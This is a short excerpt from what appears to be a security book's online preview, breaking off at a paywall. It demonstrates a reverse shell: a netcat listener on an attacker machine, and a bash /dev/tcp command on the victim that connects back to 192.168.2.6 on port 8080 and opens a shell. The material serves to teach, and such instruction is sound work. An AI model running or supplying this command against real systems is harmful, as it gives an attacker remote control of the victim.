September 2018
Intermediate to advanced
480 pages
9h 45m
English
Let's start a listener on the attacker machine. This can be achieved by executing the following command:
nc -b <interface> -lv <port>

Our listener is ready for incoming connections on port 8080.
Now let's execute the following command on the victim machine:
Bash -i>& /dev/tcp/192.168.2.6/8080 0>&1
Upon successful execution, the victim machine connects back to the attacker machine, opening a bash shell:
Now let's see what happens when the attacker executes basic commands, such as whoami and id:
The ...
Read now
Unlock full access